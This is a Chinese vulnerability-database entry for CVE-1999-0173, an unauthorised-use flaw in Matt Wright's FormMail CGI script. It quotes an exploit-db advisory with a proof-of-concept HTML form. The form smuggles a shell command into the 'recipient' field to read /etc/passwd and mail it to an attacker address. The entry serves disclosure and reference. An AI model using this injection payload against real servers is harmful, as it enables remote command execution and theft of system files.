FormMail CGI程序漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105274 漏洞类型 未知
发布时间 1997-01-01 更新时间 2006-09-05
CVE编号 CVE-1999-0173 CNNVD-ID CNNVD-199701-009
漏洞平台 Unix CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20486
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199701-009
|漏洞详情
FormMailCGI程序可以被除了该程序所属的主服务器以外的网络服务器使用。
|漏洞EXP
source: http://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:matt_wright:formmail*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0173